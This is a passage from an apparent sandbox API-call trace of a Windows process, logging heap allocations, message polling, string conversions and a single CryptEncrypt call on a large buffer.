(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0260.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0260.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0260.011] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0260.011] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0260.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0260.011] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.011] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.011] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0260.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0260.011] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.012] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0260.012] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0260.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0260.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0260.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0260.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0260.013] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0260.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.016] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0260.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51bc8 [0260.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0260.016] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15bd9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15be0) returned 1 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0260.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0260.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0260.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0260.018] CharLowerBuffW (in: lpsz="byte[89056]", cchLength=0xb | out: lpsz="byte[89056]") returned 0xb [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0260.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0260.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0260.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0260.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0260.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0260.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2e94f08 [0260.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0260.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0260.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0260.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0260.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15bd9) returned 0x2eaaaf0 [0260.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15bd9) returned 0x2ec06d8 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaaaf0 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0260.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec06d8 | out: hHeap=0x970000) returned 1 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0260.031] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0260.031] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0260.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0260.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0260.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0260.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0260.033] 